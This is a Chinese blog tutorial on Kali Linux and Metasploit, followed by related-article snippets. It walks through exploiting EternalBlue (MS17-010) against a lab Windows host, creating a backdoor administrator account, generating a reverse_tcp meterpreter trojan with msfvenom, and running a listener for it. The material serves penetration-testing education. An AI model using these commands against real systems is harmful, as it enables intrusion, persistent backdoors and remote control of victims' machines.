041-kali-安全渗透学习-01

原创 已于 2024-11-14 23:00:19 修改 · 331 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #学习 #windows

于 2023-05-21 15:02:40 首次发布
文章介绍了如何在KaliLinux中安装与部署Metasploit框架,并通过Metasploit利用MS17_010(永恒之蓝)445端口漏洞攻击Windows系统,详细步骤包括查找模块、设置目标主机和端口、运行模块以及攻击成功后的后门用户创建和远程连接开启。此外,还讲解了生成Windows可执行后门程序的方法以及如何监听和接收木马连接。

kali-学习

在这里插入图片描述

资料仅用于个人学习,恶意攻击互联网网站及操作系统属于违法行为!!

1、安装与部署kali

2、metasploit工具

msfconsole
在这里插入图片描述

2.1、metasploit攻击windows操作系统

msf使用法则:
使用模块--配置模块必选项--运行模块

示例:永恒之蓝445漏洞攻击

2.1.1、查找模块

		msf6 > search  ms17_010

2.1.2、使用模块

		msf6 > use exploit/windows/smb/ms17_010_eternalblue

2.1.3、设置必选项(Required:yes为必填)

		sf6 exploit(windows/smb/ms17_010_eternalblue) > show options

2.1.4、设置模块

		msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.63.139
		RHOSTS => 192.168.63.139
		msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 9999
		LPORT => 9999

2.1.5、运行

		run

2.1.6、攻击成功
在这里插入图片描述

成功后的操作

help可以查看可以执行的操作

例如:创建后门用户并开启远程连接

meterpreter > shell
C:\Windows\system32>net user zhangsan 123456 /add && net localgroup administrator zhangsan /add

2.2、生成远控木马

2.2.1 windows可执行程序后门(不能绕过杀毒软件)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.63.129 lport=9999 -f exe  -o demo9999.exe

在这里插入图片描述
2.2.2、执行木马监控

		msfconsole
		msf6 > use exploit/multi/handler 
		msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
		msf6 exploit(multi/handler) > set LHOST 192.168.63.129
		msf6 exploit(multi/handler) > set LPORT 9999
		run

在这里插入图片描述
当某台主机点击前期生成的木马程序时
在这里插入图片描述

MSF安装与简单使用
qq_23435961的博客
05-17 3518
MSF安装与使用 建议直接安装KaliKali是以Linux系统进行封装的。Kali系统的优点在于这个系统集合了大量的优秀的安全工具,同时还能对这些工具进行升级。其中也包含了MSF。建议是用虚拟机来运行kali系统 Kali安装可参考链接https://blog.youkuaiyun.com/qq_23435961/article/details/124821168?spm=1001.2014.3001.5502 一、远程进入MSF 打开Xshell,连接Kali系统, Linux kali 5.16.0-kali7
kali_msf6_渗透
热门推荐
摸鱼域的空气。
01-27 1万+
奶奶曾说过,证明自己学懂的方式就是教会别人。 工具简介: msf全称Metasploit是H.D. Moore在2003年开发的,它是少数几个可用于执行诸多渗透测试步骤的工具。在发现新漏洞时(这是很常见的),Metasploit会监控Rapid7,然后Metasploit的200,000多个用户会将漏洞添加到Metasploit的目录上。然后,任何人只要使用Metasploit,就可以用它来测试特定系统的是否有这个漏洞。 通俗来说msf就是一个渗透的工具包,初学者可以从kali开始了解,因为k.
通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作
weixin_60182338的博客
03-17 3423
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击
MSFKali最强渗透工具之Metasploit_kali metasploit
m0_57541068的博客
04-16 1330
此处遇到了一个小小问题:出现kali机和windows机连在同一网段,windows机能ping通kali机,而kali机无法ping通Windows的情况,最后通过关闭windows防火墙解决了问题。永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
kali 升级msfmsf6
liulanghouzi的博客
12-04 6248
安装kali过程注意不要使用网络镜像,以及将grub安装至硬盘时选择/dev/sda,其它一律默认即可 安装kali后,启动msf,发现版本很旧,没有近期的cve,打算升级一下。 但是输入apt-get update;apt-get install metasploit-framework,告诉我msf已经是最新,无须更新。 原因是安装kali时没有使用网络镜像,启动kali后又没有设置apt源,没有源当然无法更新啊。 打开/etc/apt/sources.list,添加国内镜像源: deb
30分钟快速安装虚拟机系统 -kali/渗透测试/网络安全/信息安全
06-29
标题中的“30分钟快速安装虚拟机系统 - kali/渗透测试/网络安全/信息安全”表明了这个教程的内容主要是关于如何在30分钟内迅速地在虚拟机上安装Kali Linux操作系统,以及该系统与渗透测试、网络安全和信息安全的关系...
kali-linux-network-scanning-cookbook-zh-kali
09-30
Kali Linux是一个基于Debian的Linux发行版,专注于安全审计、渗透测试和安全研究。它由Offensive Security团队开发,是著名的BackTrack Linux的后继版本。Kali Linux提供了多种专业的安全工具,广泛应用于网络安全...
kali-linux-cookbook-zh-kali
04-03
Kali Linux菜谱中文版》是一本深入浅出介绍Kali Linux使用技巧的专业书籍。书中内容涉及网络渗透测试、数字...通过实际案例和操作步骤的介绍,读者可以学习如何在真实场景中有效地使用Kali Linux来完成各种安全任务。
Linux-Tutorial-kali linux安装教程
最新发布
10-15
对于想要深入学习kali linux的用户,除了安装和基本配置,还需要掌握其内部结构和各类安全工具的使用。例如,用户需要了解目录结构、系统服务、网络配置以及如何使用kali linux提供的渗透测试工具集等。同时,用户...
在Termux中安装Kali-Linux_termux-pd-kali.zip
09-19
Kali Linux是一个基于Debian的Linux发行版,主要面向安全专家和渗透测试人员。 首先,在开始安装之前,用户需要确保已经安装了Termux应用,并拥有一定的操作权限。安装过程中可能需要开启Termux的root权限,以便更...
kali与编程:小白黑客如何1天会用msf渗透框架
Kali与编程
07-07 2402
一、每日寄语 我们这个世界,从不会给一个伤心的落伍者颁发奖牌。 二、MSF介绍 Metasploit Framework(简称SMF)安全测试工具是一款开源的安全漏洞检测工具,该工具也是免费的,因此安全工作人员常用Metasploit工具来检测系统的安全性。 这款免费工具可以帮助黑客攻击和控制计算机,安全人员也可以用该工具来加强系统对此类工具的攻击。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新。包含了180多种流行的操作系统的应用软件漏洞,以及100多个shellcode。 作为安
如何使用kalimsfconsole软件生成木马(shell和meterpreter类型)投放至本机进行控制???超级详细!!!
2301_77578012的博客
05-05 1041
msf的使用
kali linux安装msf
weixin_45719968的博客
09-25 1633
kali linux安装 msf过程
Kali更新msf6遇到的一些问题
weixin_45287663的博客
10-06 4344
kali更新msf6 第一次更新直接使用msfupdate 被告知该命令已经不再支持,需要使用“apt install metasploit-framework”进行更新,随即使用该命令进行更新 发现依然有问题,无法更新 ,之后使用一句话进行更新 curl https://raw.githubusercontent.com:443/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupda
Metasploit(MSF)使用详解
m0_74806866的博客
11-30 2361
本篇文章通过一次渗透测试,向大家介绍关于Metasploit的使用、参数和渗透测试的应用
Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kaliMSF基础命令
天下著书立传者,皆为我师
04-18 1565
Metasploitable2-linux:攻击机 192.168.234.8。kali-debian:攻击机 192.168.234.141。修改网卡后,需要重启网卡:service networking restart。win7 虚拟机:靶机 192.168.234.158。注:win7靶机需要关闭防火墙,kali才能ping通。同时还需要配置虚拟机网络。
kali linux之配置IP及远程登录实测(保姆级)
qq_57223070的博客
09-21 3435
修改IP及远程的登陆还有比较有意思的arp欺骗保姆级教程。
kali linux --msf相关基础命令
2301_80419020的博客
12-23 537
【代码】kali linux --msf相关基础命令。
kali linux 网络配置
wh940830165的博客
05-16 3341
这种方式仅用于配置临时性的IP地址,当系统重启或者网络服务重启后,我们这样配置的IP地址即失效。首先打开kali网络配置文件 /etc/network/interfaces。iface eth0 inet static #网络接口为静态。address 192.168.136.199 #静态IP地址。gateway 192.168.136.254 #网关。netmask 255.255.255.0 #掩码。保存退出:按键盘Esc 输入 :wq。auto eth0 #网卡名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

深度学习007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值